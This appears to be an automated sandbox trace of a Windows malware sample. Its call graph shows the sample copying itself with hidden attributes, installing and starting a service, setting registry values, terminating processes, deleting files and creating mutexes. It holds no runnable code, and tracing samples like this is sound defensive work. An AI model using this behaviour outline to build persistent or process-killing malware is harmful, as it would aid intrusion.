API calls 9550->9555 9552->9550 9553 a39323 GetModuleFileNameA 9862 a3a4e0 lstrlen 9553->9862 9556 a388ab 9555->9556 9558 a41bb0 2 API calls 9556->9558 9557 a393ae 9560 a3a4e0 lstrlen 9557->9560 9559 a388db 9558->9559 9561 a38926 9559->9561 9563 a32800 ExitProcess 9559->9563 9562 a3945a 9560->9562 9807 a3e430 9561->9807 9564 a3a4e0 lstrlen 9562->9564 9563->9561 9579 a3947b 9564->9579 9567 a32f90 2 API calls 9568 a38978 9567->9568 9572 a41bb0 2 API calls 9568->9572 9569 a39744 9884 a53cf0 9569->9884 9571 a397b2 9573 a397d4 9571->9573 9574 a32800 ExitProcess 9571->9574 9594 a389cb 9572->9594 9893 a59b00 9573->9893 9574->9573 9576 a3981d 9577 a608b0 GetSystemTimeAsFileTime 9576->9577 9578 a39830 9577->9578 9987 a548d0 9578->9987 9579->9569 9864 a48a70 9579->9864 9581 a3956f 9870 a59580 9581->9870 9586 a3971a 9587 a32800 ExitProcess 9586->9587 9587->9569 9589 a38b61 Sleep 9598 a38b90 9589->9598 9590 a3958b 9590->9586 9591 a32f90 2 API calls 9590->9591 9592 a39651 9591->9592 9883 a3d500 lstrlen 9592->9883 9594->9589 9595 a38c99 Sleep 9594->9595 9614 a38cd8 9594->9614 9812 a42120 9594->9812 9823 a41530 9594->9823 9834 a608b0 GetSystemTimeAsFileTime 9594->9834 9595->9594 9596 a41530 5 API calls 9596->9598 9597 a39666 MessageBoxA 9601 a41bb0 2 API calls 9597->9601 9598->9594 9598->9596 9600 a42120 5 API calls 9600->9614 9603 a396ef 9601->9603 9602 a398a8 9608 a32f90 2 API calls 9602->9608 9612 a399ff 9602->9612 9606 a32800 ExitProcess 9603->9606 9604 a38de6 9605 a41530 5 API calls 9604->9605 9607 a38e04 9605->9607 9606->9586 9617 a391b3 9607->9617 9618 a38e5c GetModuleFileNameA SetFileAttributesA CopyFileA 9607->9618 9611 a399e4 9608->9611 9610 a38d8c Sleep 9610->9614 9991 a3c540 9611->9991 9613 a39a71 9612->9613 9996 a4ee80 9612->9996 9622 a39aa3 CloseHandle SetFileAttributesA CopyFileA 9613->9622 9643 a39d65 9613->9643 9614->9600 9614->9604 9836 a3bbc0 9614->9836 9850 a5fa80 9617->9850 9620 a32f90 2 API calls 9618->9620 9619 a39a32 9621 a39a53 9619->9621 9623 a32800 
ExitProcess 9619->9623 9633 a38eff 9620->9633 10007 a326e0 9621->10007 9625 a39c78 9622->9625 9626 a39b1a SetFileAttributesA 9622->9626 9623->9621 10037 a53110 9625->10037 9628 a39b73 9626->9628 9629 a39b5d 9626->9629 9636 a39c2a Sleep 9628->9636 10027 a47a50 9628->10027 10015 a40500 OpenSCManagerA 9629->10015 9630 a39210 9855 a32800 9630->9855 9634 a41bb0 2 API calls 9633->9634 9638 a38f61 9634->9638 9640 a5fa80 3 API calls 9636->9640 9637 a42120 5 API calls 9637->9643 9646 a32f90 2 API calls 9638->9646 9662 a3904a 9638->9662 9640->9625 9642 a39e57 SetFileAttributesA CopyFileA SetFileAttributesA 9652 a3e430 lstrlen 9642->9652 9643->9637 9643->9642 9644 a3bbc0 8 API calls 9643->9644 9651 a39e1a Sleep 9644->9651 9657 a38fbf 9646->9657 9647 a39113 SetFileAttributesA 9653 a391a4 9647->9653 9648 a3913d SetFileAttributesA 9648->9653 9650 a32800 ExitProcess 9650->9643 9651->9642 9651->9643 9655 a39ee1 9652->9655 9653->9617 9656 a32f90 2 API calls 9655->9656 9659 a39efd 9656->9659 9658 a41bb0 2 API calls 9657->9658 9658->9662 9660 a32f90 2 API calls 9659->9660 9661 a39fbe 9660->9661 9663 a41bb0 2 API calls 9661->9663 9662->9647 9662->9648 9664 a3a039 9663->9664 10041 a40dc0 9664->10041 9666 a3a050 9667 a41bb0 2 API calls 9666->9667 9668 a3a06b 9667->9668 10045 a41200 9668->10045 9671 a32f90 2 API calls 9672 a3a0ae 9671->9672 9673 a32f90 2 API calls 9672->9673 9674 a3a0c6 9673->9674 10066 a65820 9674->10066 9676 a3a0f2 9677 a41bb0 2 API calls 9676->9677 9678 a3a115 9677->9678 9679 a41bb0 2 API calls 9678->9679 9680 a3a127 9679->9680 9681 a5fa80 3 API calls 9680->9681 9682 a3a185 9681->9682 9683 a3a24e CreateThread 9682->9683 9684 a3a2a2 9683->9684 9685 a3a2cd 9683->9685 10069 a3c660 StartServiceCtrlDispatcherA 9684->10069 9687 a3a310 Sleep 9685->9687 9687->9687 9689 a41bd0 9688->9689 9690 a42eb0 2 API calls 9689->9690 9691 a37a18 9690->9691 9692 a32f90 9691->9692 9693 a32feb 9692->9693 10070 a3e2c0 9693->10070 9695 a33034 9695->9454 9697 a38388 9696->9697 9698 a650e0 
9697->9698 9699 a65186 GetSystemTime 9698->9699 9700 a65172 9698->9700 9701 a651be 9699->9701 9700->9699 9702 a608b0 GetSystemTimeAsFileTime 9701->9702 9703 a652a7 GetTickCount 9702->9703 9704 a652d4 9703->9704 9704->9518 9706 a4521d 9705->9706 9707 a452b2 GetVersionExA 9706->9707 10073 a3b7a0 AllocateAndInitializeSid 9707->10073 9713 a32f90 2 API calls 9714 a45652 9713->9714 10093 a3d530 9714->10093 9717 a41bb0 2 API calls 9722 a45692 9717->9722 9718 a45496 CreateDirectoryA 9720 a32f90 2 API calls 9718->9720 9719 a45357 9719->9718 9721 a454bb 9720->9721 9723 a41bb0 2 API calls 9721->9723 10097 a41d90 9722->10097 9725 a4550a 9723->9725 9725->9713 9726 a456cb 9727 a456d6 DeleteFileA RemoveDirectoryA 9726->9727 9728 a4575d 9726->9728 9727->9728 9729 a3f0d0 6 API calls 9728->9729 9730 a45776 9729->9730 9731 a4581e CreateDirectoryA 9730->9731 9732 a4585b 9731->9732 9733 a3e430 lstrlen 9732->9733 9734 a458cb CreateDirectoryA 9733->9734 9735 a45917 9734->9735 9736 a32f90 2 API calls 9735->9736 9737 a4592d 9736->9737 9738 a32f90 2 API calls 9737->9738 9739 a459e9 9738->9739 9740 a41bb0 2 API calls 9739->9740 9741 a45a07 9740->9741 9742 a3d530 9 API calls 9741->9742 9743 a45a77 9742->9743 9744 a41bb0 2 API calls 9743->9744 9745 a45aaa 9744->9745 9746 a41d90 5 API calls 9745->9746 9747 a45ad7 9746->9747 9748 a464f5 9747->9748 9749 a45b07 9747->9749 9750 a45c42 9747->9750 9753 a3e430 lstrlen 9748->9753 9752 a32f90 2 API calls 9749->9752 9751 a32f90 2 API calls 9750->9751 9754 a45c61 9751->9754 9755 a45b2d 9752->9755 9756 a46549 SetFileAttributesA 9753->9756 9757 a65820 wvsprintfA 9754->9757 9758 a65820 wvsprintfA 9755->9758 9764 a4657e 9756->9764 9759 a45c87 9757->9759 9760 a45b5a 9758->9760 9761 a41bb0 2 API calls 9759->9761 9762 a41bb0 2 API calls 9760->9762 9763 a45b9f 9761->9763 9762->9763 9765 a45bea 9763->9765 9764->9531 9766 a45d53 CreateDirectoryA 9765->9766 9767 a45d9a 9766->9767 9768 a3e430 lstrlen 9767->9768 9769 a45e4f CreateDirectoryA 9768->9769 9770 a32f90 2 
API calls 9769->9770 9771 a45e9e 9770->9771 9772 a32f90 2 API calls 9771->9772 9773 a45f4c 9772->9773 9774 a41bb0 2 API calls 9773->9774 9775 a45f68 9774->9775 9776 a3d530 9 API calls 9775->9776 9777 a45f86 9776->9777 9778 a41bb0 2 API calls 9777->9778 9779 a45fcf 9778->9779 9780 a41d90 5 API calls 9779->9780 9781 a46002 9780->9781 9782 a46485 9781->9782 9783 a4600d GetTempPathA 9781->9783 9782->9748 10113 a3d500 lstrlen 9783->10113 9785 a4604f 9786 a3e430 lstrlen 9785->9786 9787 a461cb CreateDirectoryA 9786->9787 9789 a46219 9787->9789 9790 a32f90 2 API calls 9789->9790 9791 a46237 9790->9791 9792 a32f90 2 API calls 9791->9792 9793 a462be 9792->9793 9794 a41bb0 2 API calls 9793->9794 9795 a46302 9794->9795 9796 a3d530 9 API calls 9795->9796 9797 a46360 9796->9797 9798 a41bb0 2 API calls 9797->9798 9799 a46372 9798->9799 9800 a41d90 5 API calls 9799->9800 9801 a463b5 9800->9801 9801->9782 9802 a463c0 GetTempPathA 9801->9802 9803 a463ff 9802->9803 9804 a32f90 2 API calls 9803->9804 9805 a4642d 9804->9805 9806 a41bb0 2 API calls 9805->9806 9806->9782 9808 a548d0 lstrlen 9807->9808 9809 a3e451 9808->9809 9810 a38961 9809->9810 10152 a3d500 lstrlen 9809->10152 9810->9567 9813 a42196 CreateToolhelp32Snapshot 9812->9813 9814 a4218c 9812->9814 9815 a421fe Process32First 9813->9815 9816 a42450 9813->9816 9814->9813 9818 a4240d FindCloseChangeNotification 9815->9818 9820 a4227a 9815->9820 9816->9594 9818->9816 9819 a3a4e0 lstrlen 9819->9820 9820->9819 9821 a42346 Process32Next 9820->9821 9822 a4239c 9820->9822 9821->9820 9821->9822 9822->9818 9824 a41561 9823->9824 9825 a4157f CreateFileA 9823->9825 9824->9825 9826 a41611 9825->9826 9827 a41657 9826->9827 9828 a41673 GetFileTime 9826->9828 9827->9594 9829 a41694 CloseHandle 9828->9829 9830 a416bf __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 9828->9830 9829->9594 9831 a41771 GetFileSize CloseHandle 9830->9831 9832 a4174d 9830->9832 9833 a417be 9831->9833 9832->9831 9833->9594 9835 a60958 __aulldiv 9834->9835 9835->9594 9837 
a3bbe1 CreateToolhelp32Snapshot 9836->9837 9839 a3bcbb Process32First 9837->9839 9841 a3bf47 9837->9841 9840 a3bf1a CloseHandle 9839->9840 9843 a3bd05 9839->9843 9840->9841 9841->9610 9842 a3a4e0 lstrlen 9842->9843 9843->9842 9844 a3bdbb OpenProcess 9843->9844 9845 a3bedd Process32Next 9843->9845 9844->9843 9846 a3be02 TerminateProcess 9844->9846 9845->9843 9849 a3bf19 9845->9849 9847 a3be67 CloseHandle 9846->9847 9848 a3be4a 9846->9848 9847->9843 9847->9848 9848->9843 9848->9847 9849->9840 9851 a5faaa 9850->9851 9852 a5fb6a CreateProcessA 9851->9852 9853 a5fc8f 9852->9853 9854 a5fbff CloseHandle CloseHandle 9852->9854 9853->9630 9854->9630 9856 a3281d 9855->9856 9857 a3283e ExitProcess 9856->9857 10153 a3d500 lstrlen 9858->10153 9860 a5b9c3 9860->9548 9861->9553 9863 a3a53c 9862->9863 9863->9557 9865 a48a95 9864->9865 10154 a3ca40 9865->10154 9867 a48b1d 9868 a5fa80 3 API calls 9867->9868 9869 a48b65 9868->9869 9869->9581 9871 a59902 9870->9871 9872 a595a9 9870->9872 9871->9590 10192 a3d500 lstrlen 9872->10192 9874 a5965d Sleep 9875 a596b9 9874->9875 9876 a32f90 2 API calls 9875->9876 9877 a596e9 9876->9877 9878 a41bb0 2 API calls 9877->9878 9879 a5979d FindFirstFileA 9878->9879 9880 a597d6 9879->9880 9880->9871 9881 a59877 DeleteFileA FindNextFileA 9880->9881 9881->9880 9882 a598d9 FindClose 9881->9882 9882->9871 9883->9597 9885 a53d35 9884->9885 9886 a3e430 lstrlen 9885->9886 9887 a53d66 9886->9887 9888 a32f90 2 API calls 9887->9888 9889 a53d82 9888->9889 9890 a41bb0 2 API calls 9889->9890 9891 a53dd1 CreateFileA 9890->9891 9892 a53e32 9891->9892 9892->9571 9895 a59b93 9893->9895 9894 a59c40 GetComputerNameA 9896 a59cbb 9894->9896 9897 a59c53 9894->9897 9895->9894 9900 a32f90 2 API calls 9896->9900 9898 a32f90 2 API calls 9897->9898 9899 a59c7e 9898->9899 9902 a41bb0 2 API calls 9899->9902 9901 a59d55 9900->9901 9903 a41bb0 2 API calls 9901->9903 9902->9896 9904 a59db1 9903->9904 9905 a3d530 9 API calls 9904->9905 9906 a59dd5 9905->9906 10193 a42c30 9906->10193 
9908 a59e08 10196 a4a930 9908->10196 9910 a59f23 10235 a3d500 lstrlen 9910->10235 9912 a59f65 10236 a601a0 9912->10236 9916 a59fcf 9917 a42c30 8 API calls 9916->9917 9918 a59ffe 9917->9918 9919 a601a0 9 API calls 9918->9919 9920 a5a0a3 9919->9920 9921 a61050 8 API calls 9920->9921 9922 a5a0b2 9921->9922 9923 a42c30 8 API calls 9922->9923 9924 a5a0dd 9923->9924 9925 a601a0 9 API calls 9924->9925 9926 a5a118 9925->9926 9927 a61050 8 API calls 9926->9927 9928 a5a127 9927->9928 9929 a42c30 8 API calls 9928->9929 9930 a5a16c 9929->9930 9931 a601a0 9 API calls 9930->9931 9932 a5a18b 9931->9932 9933 a61050 8 API calls 9932->9933 9934 a5a197 9933->9934 9935 a42c30 8 API calls 9934->9935 9936 a5a1e1 9935->9936 9937 a601a0 9 API calls 9936->9937 9938 a5a204 9937->9938 9939 a61050 8 API calls 9938->9939 9940 a5a213 9939->9940 9941 a42c30 8 API calls 9940->9941 9942 a5a248 9941->9942 9943 a32f90 2 API calls 9942->9943 9944 a5a280 9943->9944 9945 a601a0 9 API calls 9944->9945 9946 a5a2bf 9945->9946 9947 a61050 8 API calls 9946->9947 9948 a5a2ce 9947->9948 9949 a41bb0 2 API calls 9948->9949 9950 a5a2f5 9949->9950 9951 a42c30 8 API calls 9950->9951 9952 a5a31b 9951->9952 9953 a601a0 9 API calls 9952->9953 9954 a5a347 9953->9954 9955 a61050 8 API calls 9954->9955 9956 a5a353 9955->9956 9957 a42c30 8 API calls 9956->9957 9958 a5a391 9957->9958 9959 a601a0 9 API calls 9958->9959 9960 a5a3aa 9959->9960 9961 a61050 8 API calls 9960->9961 9962 a5a3b9 9961->9962 9963 a42c30 8 API calls 9962->9963 9964 a5a402 9963->9964 10243 a42f60 9964->10243 9968 a5a465 9969 a601a0 9 API calls 9968->9969 9970 a5a471 9969->9970 9971 a61050 8 API calls 9970->9971 9972 a5a480 9971->9972 9973 a42c30 8 API calls 9972->9973 9974 a5a4d1 9973->9974 9975 a601a0 9 API calls 9974->9975 9976 a5a502 9975->9976 9977 a61050 8 API calls 9976->9977 9978 a5a511 9977->9978 10252 a497b0 9978->10252 9980 a5a54f 10279 a4d990 9980->10279 9982 a5a575 10282 a44290 9982->10282 9984 a5a5b3 10286 a50480 9984->10286 9986 a5a63b 
9986->9576 9988 a54926 9987->9988 10337 a3d500 lstrlen 9988->10337 9990 a54948 9990->9602 9992 a53110 WaitForSingleObject 9991->9992 9993 a3c562 9992->9993 9994 a32800 ExitProcess 9993->9994 9995 a3c578 9994->9995 9995->9612 9997 a4ee9d 9996->9997 9998 a3e430 lstrlen 9997->9998 9999 a4eef8 9998->9999 10000 a32f90 2 API calls 9999->10000 10001 a4ef29 9999->10001 10002 a4ef91 10000->10002 10001->9619 10003 a41bb0 2 API calls 10002->10003 10004 a4f001 10003->10004 10338 a3d000 10004->10338 10006 a4f020 10006->9619 10008 a608b0 GetSystemTimeAsFileTime 10007->10008 10010 a32703 10008->10010 10009 a327c8 10009->9613 10010->10009 10011 a608b0 GetSystemTimeAsFileTime 10010->10011 10013 a32751 10011->10013 10012 a32770 Sleep 10012->10013 10013->10009 10013->10012 10014 a608b0 GetSystemTimeAsFileTime 10013->10014 10014->10013 10016 a407be 10015->10016 10017 a4055f CreateServiceA 10015->10017 10016->9628 10018 a405be 10017->10018 10019 a406bc OpenServiceA 10018->10019 10020 a405d8 ChangeServiceConfig2A StartServiceA 10018->10020 10024 a40716 StartServiceA CloseServiceHandle 10019->10024 10025 a4075e CloseServiceHandle 10019->10025 10021 a4067e CloseServiceHandle 10020->10021 10021->10025 10024->10025 10025->10016 10028 a47ab7 10027->10028 10029 a32f90 2 API calls 10028->10029 10030 a47b71 10029->10030 10031 a41bb0 2 API calls 10030->10031 10033 a47bcb 10031->10033 10032 a47cc0 RegCloseKey 10034 a39c15 10032->10034 10033->10032 10356 a3d500 lstrlen 10033->10356 10034->9636 10036 a47c87 RegSetValueExA 10036->10032 10038 a5312e WaitForSingleObject 10037->10038 10040 a39d15 10038->10040 10040->9650 10043 a40de7 10041->10043 10042 a40f4e CreateFileA 10044 a40f80 10042->10044 10043->10042 10044->9666 10046 a41254 10045->10046 10047 a4126b 10045->10047 10049 a40920 8 API calls 10046->10049 10048 a32f90 2 API calls 10047->10048 10050 a412b3 10048->10050 10049->10047 10051 a40dc0 CreateFileA 10050->10051 10052 a412cd 10051->10052 10053 a41bb0 2 API calls 10052->10053 10054 a4131f 
10053->10054 10055 a41378 Sleep 10054->10055 10065 a41420 10054->10065 10056 a32f90 2 API calls 10055->10056 10058 a413b7 10056->10058 10057 a3a090 10057->9671 10059 a40dc0 CreateFileA 10058->10059 10061 a413cc 10059->10061 10064 a41bb0 2 API calls 10061->10064 10062 a4147c 10362 a65370 CloseHandle 10062->10362 10064->10065 10065->10057 10357 a410e0 10065->10357 10067 a6587d wvsprintfA 10066->10067 10068 a6586d 10066->10068 10067->9676 10068->10067 10069->9685 10071 a3e2f2 GetProcessHeap RtlAllocateHeap 10070->10071 10072 a3e2e4 10070->10072 10071->9695 10072->10071 10074 a3b84e 10073->10074 10075 a3b86a CheckTokenMembership 10074->10075 10076 a3b887 10074->10076 10075->10076 10077 a3fbc0 10076->10077 10078 a3fc3c 10077->10078 10079 a32f90 2 API calls 10078->10079 10080 a3fc76 GetProcAddress 10079->10080 10081 a41bb0 2 API calls 10080->10081 10082 a3fcb4 10081->10082 10083 a3fcc5 GetCurrentProcess 10082->10083 10084 a3fcdc 10082->10084 10083->10084 10084->9725 10085 a3f0d0 GetWindowsDirectoryA 10084->10085 10086 a3f122 10085->10086 10087 a32f90 2 API calls 10086->10087 10092 a3f1d3 10086->10092 10088 a3f170 10087->10088 10089 a41bb0 2 API calls 10088->10089 10090 a3f1bb 10089->10090 10114 a3d500 lstrlen 10090->10114 10092->9719 10094 a3d54a 10093->10094 10115 a3fa50 10094->10115 10098 a41d9d 10097->10098 10099 a53110 WaitForSingleObject 10098->10099 10100 a41e0c 10099->10100 10101 a41e23 10100->10101 10102 a41e4c CreateFileA 10100->10102 10103 a5fcc0 ReleaseMutex 10101->10103 10104 a41e93 10102->10104 10108 a41ed1 10102->10108 10106 a41e39 10103->10106 10105 a5fcc0 ReleaseMutex 10104->10105 10107 a41eaf 10105->10107 10106->9726 10107->9726 10109 a41fe8 WriteFile 10108->10109 10109->10108 10110 a42069 FindCloseChangeNotification 10109->10110 10148 a5fcc0 10110->10148 10113->9785 10114->10092 10116 a3fa7e 10115->10116 10121 a3d500 lstrlen 10116->10121 10118 a3fae4 10122 a42df0 10118->10122 10120 a3d55f 10120->9717 10121->10118 10125 a4bff0 10122->10125 10124 a42e3e 
10124->10120 10126 a4c006 10125->10126 10127 a4c00d 10126->10127 10130 a53f00 10126->10130 10127->10124 10129 a4c04f 10129->10124 10132 a53f30 10130->10132 10131 a53f46 10131->10129 10132->10131 10134 a40110 10132->10134 10135 a40128 10134->10135 10136 a4038a 10135->10136 10137 a40266 10135->10137 10140 a40367 10135->10140 10143 a468d0 10136->10143 10139 a3e2c0 2 API calls 10137->10139 10141 a40276 10139->10141 10140->10131 10142 a42eb0 2 API calls 10141->10142 10142->10140 10144 a46901 10143->10144 10145 a46966 GetProcessHeap HeapAlloc 10144->10145 10146 a46926 GetProcessHeap RtlReAllocateHeap 10144->10146 10145->10140 10146->10140 10149 a5fce5 ReleaseMutex 10148->10149 10150 a5fcdb 10148->10150 10151 a420a1 10149->10151 10150->10149 10151->9726 10152->9810 10153->9860 10155 a3caa0 10154->10155 10156 a3cae7 CreateFileA 10155->10156 10157 a3cb3d ReadFile 10156->10157 10160 a3cf5d 10156->10160 10158 a3cb79 10157->10158 10159 a3cbbc CloseHandle 10157->10159 10158->10159 10183 a42a20 10159->10183 10160->9867 10162 a3cbf5 GetTickCount 10185 a61520 10162->10185 10164 a3cc2a 10189 a3d500 lstrlen 10164->10189 10166 a3cc81 10167 a32f90 2 API calls 10166->10167 10168 a3ccd1 10167->10168 10169 a41bb0 2 API calls 10168->10169 10170 a3cd00 10169->10170 10171 a3cddc CreateFileA 10170->10171 10173 a32f90 2 API calls 10170->10173 10171->10160 10174 a3cef5 WriteFile 10171->10174 10175 a3cd54 10173->10175 10176 a3cf32 10174->10176 10177 a3cf46 CloseHandle 10174->10177 10190 a3d500 lstrlen 10175->10190 10176->10177 10177->10160 10179 a3cd6c 10180 a65820 wvsprintfA 10179->10180 10181 a3cd77 10180->10181 10182 a41bb0 2 API calls 10181->10182 10182->10171 10184 a42a3b 10183->10184 10184->10162 10186 a61546 10185->10186 10191 a3d500 lstrlen 10186->10191 10188 a615bf 10188->10164 10189->10166 10190->10179 10191->10188 10192->9874 10194 a44290 8 API calls 10193->10194 10195 a42c4d 10194->10195 10195->9908 10197 a4a998 10196->10197 10198 a32f90 2 API calls 10197->10198 10199 a4aa6c 
10198->10199 10200 a41bb0 2 API calls 10199->10200 10201 a4aab7 GetProcessHeap 10200->10201 10202 a4ab54 10201->10202 10203 a4aaeb 10201->10203 10204 a32f90 2 API calls 10202->10204 10203->9910 10205 a4ab6a LoadLibraryA 10204->10205 10206 a4abb1 10205->10206 10207 a41bb0 2 API calls 10206->10207 10209 a4abcb 10207->10209 10208 a4abf6 10208->9910 10209->10208 10210 a32f90 2 API calls 10209->10210 10211 a4ac99 GetProcAddress 10210->10211 10212 a41bb0 2 API calls 10211->10212 10213 a4acd9 10212->10213 10214 a4acf0 FreeLibrary 10213->10214 10215 a4ad28 HeapAlloc 10213->10215 10214->9910 10216 a4ad78 10215->10216 10217 a4ada4 FreeLibrary 10216->10217 10218 a4adfa 10216->10218 10217->9910 10220 a4ae30 HeapFree 10218->10220 10225 a4af24 10218->10225 10221 a4ae77 10220->10221 10222 a4ae8a HeapAlloc 10220->10222 10221->10222 10223 a4aeaa FreeLibrary 10222->10223 10222->10225 10224 a4aedf 10223->10224 10224->9910 10227 a32f90 2 API calls 10225->10227 10234 a4b22b 10225->10234 10226 a4b6ad HeapFree FreeLibrary 10226->9910 10228 a4affe 10227->10228 10229 a41bb0 2 API calls 10228->10229 10230 a4b074 10229->10230 10231 a32f90 2 API calls 10230->10231 10230->10234 10232 a4b249 10231->10232 10233 a41bb0 2 API calls 10232->10233 10233->10234 10234->10226 10235->9912 10291 a4a810 10236->10291 10239 a61050 10240 a61071 10239->10240 10241 a44290 8 API calls 10240->10241 10242 a6107f 10241->10242 10242->9916 10244 a42f95 10243->10244 10245 a32f90 2 API calls 10244->10245 10246 a42fd0 10245->10246 10247 a41bb0 2 API calls 10246->10247 10248 a43030 10247->10248 10249 a46600 10248->10249 10298 a3d500 lstrlen 10249->10298 10251 a46655 10251->9968 10253 a497e8 10252->10253 10254 a32f90 2 API calls 10253->10254 10255 a4987a 10254->10255 10256 a32f90 2 API calls 10255->10256 10257 a498a9 10256->10257 10258 a32f90 2 API calls 10257->10258 10259 a498d7 10258->10259 10260 a41bb0 2 API calls 10259->10260 10261 a49917 10260->10261 10262 a32f90 2 API calls 10261->10262 10263 a49955 10262->10263 
10264 a41bb0 2 API calls 10263->10264 10265 a499ab 10264->10265 10266 a41bb0 2 API calls 10265->10266 10270 a49a2b 10266->10270 10267 a4a5a1 10268 a41bb0 2 API calls 10267->10268 10272 a4a606 10268->10272 10271 a31ca0 9 API calls 10270->10271 10278 a49f98 10270->10278 10299 a46810 10270->10299 10271->10270 10272->9980 10273 a46810 8 API calls 10273->10278 10274 a4a428 10274->10267 10275 a46810 8 API calls 10274->10275 10302 a31ca0 10274->10302 10275->10274 10277 a31ca0 9 API calls 10277->10278 10278->10267 10278->10273 10278->10274 10278->10277 10280 a4bff0 8 API calls 10279->10280 10281 a4d997 10280->10281 10281->9982 10283 a442e3 10282->10283 10284 a4bff0 8 API calls 10283->10284 10285 a4432f 10284->10285 10285->9984 10313 a54450 10286->10313 10288 a504ab 10289 a44290 8 API calls 10288->10289 10290 a50589 10288->10290 10289->10290 10290->9986 10292 a4a81c 10291->10292 10297 a3d500 lstrlen 10292->10297 10294 a4a8a0 10295 a42df0 8 API calls 10294->10295 10296 a4a8ac 10295->10296 10296->10239 10297->10294 10298->10251 10308 a41c30 10299->10308 10301 a4681e 10301->10270 10303 a3d5d0 10302->10303 10312 a3d500 lstrlen 10303->10312 10305 a3d630 10306 a44290 8 API calls 10305->10306 10307 a3d63c 10306->10307 10307->10274 10309 a41c67 10308->10309 10310 a4bff0 8 API calls 10309->10310 10311 a41c89 10310->10311 10311->10301 10312->10305 10318 a600f0 10313->10318 10315 a54475 10315->10288 10317 a5457d 10315->10317 10322 a40920 10315->10322 10317->10288 10319 a60149 10318->10319 10320 a6010b 10318->10320 10319->10315 10321 a4d990 8 API calls 10320->10321 10321->10319 10323 a40945 10322->10323 10324 a53110 WaitForSingleObject 10323->10324 10325 a40a18 10324->10325 10326 a32f90 2 API calls 10325->10326 10336 a40b2c 10325->10336 10327 a40a68 GetProcAddress 10326->10327 10328 a40aa7 10327->10328 10329 a32f90 2 API calls 10328->10329 10330 a40ad3 10329->10330 10332 a41bb0 2 API calls 10330->10332 10331 a5fcc0 ReleaseMutex 10333 a40d8e 10331->10333 10334 a40ae7 GetProcAddress 
10332->10334 10333->10315 10335 a41bb0 2 API calls 10334->10335 10335->10336 10336->10331 10337->9990 10339 a3d00d 10338->10339 10340 a4d990 8 API calls 10339->10340 10341 a3d0dd 10340->10341 10342 a53110 WaitForSingleObject 10341->10342 10343 a3d0f2 CreateFileA 10342->10343 10344 a3d131 10343->10344 10350 a3d140 10343->10350 10345 a5fcc0 ReleaseMutex 10344->10345 10347 a3d410 10345->10347 10346 a3d1b9 ReadFile 10346->10350 10347->10006 10348 a40110 8 API calls 10348->10350 10349 a3d3e3 CloseHandle 10349->10344 10350->10346 10350->10348 10350->10349 10351 a44290 8 API calls 10350->10351 10352 a3d294 CloseHandle 10350->10352 10351->10350 10354 a5fcc0 ReleaseMutex 10352->10354 10355 a3d322 10354->10355 10355->10006 10356->10036 10358 a41115 10357->10358 10359 a41126 10357->10359 10358->10062 10360 a41137 10359->10360 10361 a4114e WriteFile 10359->10361 10360->10062 10361->10062 10363 a653d4 10362->10363 10363->10057 10658 a3e211 10659 a3e240 ExitProcess 10658->10659 10661 a46c10 10663 a46c21 RegisterServiceCtrlHandlerA 10661->10663 10664 a46da2 SetServiceStatus CreateEventA 10663->10664 10665 a46fc8 10663->10665 10666 a46e58 SetServiceStatus 10664->10666 10667 a46e3b 10664->10667 10668 a46ea0 WaitForSingleObject 10666->10668 10667->10666 10668->10668 10669 a46ecb 10668->10669 10670 a53110 WaitForSingleObject 10669->10670 10671 a46eff SetServiceStatus CloseHandle SetServiceStatus 10670->10671 10671->10665 11240 a54590 11241 a545bd 11240->11241 11242 a50610 2 API calls 11241->11242 11243 a545c2 11242->11243 11244 a5fde0 3 API calls 11243->11244 11245 a545ee 11244->11245 11246 a54672 ExitProcess 11245->11246 11247 a55f98 11248 a55706 11247->11248 11249 a586f1 11248->11249 11251 a3d500 lstrlen 11248->11251 11251->11248 10543 a544e5 10544 a544f0 10543->10544 10545 a40920 8 API calls 10544->10545 10546 a5457d 10544->10546 10545->10544 10551 a566e7 10552 a5679c 10551->10552 10556 a55706 10552->10556 10558 a3d500 lstrlen 10552->10558 10554 a586f1 10556->10554 10557 a3d500 
lstrlen 10556->10557 10557->10556 10558->10556 10672 a41860 10673 a4187d 10672->10673 10674 a4189b SetServiceStatus 10673->10674 10676 a418c1 10673->10676 10677 a418cb SetServiceStatus SetEvent 10673->10677 10676->10677 11259 a555e0 11260 a55643 11259->11260 11263 a55679 11259->11263 11261 a556c7 11263->11261 11264 a3d500 lstrlen 11263->11264 11264->11263 11449 a32764 11450 a32770 Sleep 11449->11450 11452 a3279b 11450->11452 11451 a608b0 GetSystemTimeAsFileTime 11451->11452 11452->11450 11452->11451 11453 a327c8 11452->11453 10678 a43874 10687 a43880 10678->10687 10679 a53a80 4 API calls 10679->10687 10680 a44009 10681 a4403e 10680->10681 10682 a4404a 10680->10682 10684 a31170 2 API calls 10681->10684 10685 a31170 2 API calls 10682->10685 10683 a31170 2 API calls 10689 a43959 10683->10689 10688 a44045 10684->10688 10685->10688 10686 a42c90 4 API calls 10686->10687 10687->10679 10687->10686 10687->10689 10689->10680 10689->10683 11265 a46ff0 11266 a4700d 11265->11266 11275 a3d500 lstrlen 11266->11275 11268 a47083 11269 a40110 8 API calls 11268->11269 11270 a47099 11269->11270 11271 a31ca0 9 API calls 11270->11271 11272 a470ac 11271->11272 11273 a53080 8 API calls 11272->11273 11274 a470d0 11273->11274 11275->11268 10694 a56a7b 10695 a56a8c 10694->10695 10696 a57846 10695->10696 10697 a577c2 10695->10697 10711 a55706 10695->10711 10699 a57852 10696->10699 10700 a5793b 10696->10700 10698 a65820 wvsprintfA 10697->10698 10698->10711 10702 a578c5 10699->10702 10704 a5786e 10699->10704 10701 a579a8 10700->10701 10703 a57957 10700->10703 10705 a65820 wvsprintfA 10701->10705 10706 a65820 wvsprintfA 10702->10706 10707 a65820 wvsprintfA 10703->10707 10703->10711 10708 a65820 wvsprintfA 10704->10708 10704->10711 10705->10711 10706->10711 10707->10711 10708->10711 10709 a586f1 10711->10709 10712 a3d500 lstrlen 10711->10712 10712->10711 11284 a3a5c0 11285 a4d990 8 API calls 11284->11285 11286 a3a600 11285->11286 11291 a32b40 11286->11291 11288 a3a61d 11289 a4d990 8 API calls 
APIs
• GetEnvironmentVariableA.KERNEL32(00000000,C:\Windows\system32\config\systemprofile,00000104), ref: 00A383DA
• CreateMutexA.KERNELBASE(00000000,00000000,00000000), ref: 00A38448
• CreateMutexA.KERNELBASE(00000000,00000000,00000000), ref: 00A384DC
• CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 00A384F7
• GetTickCount.KERNEL32 ref: 00A38599
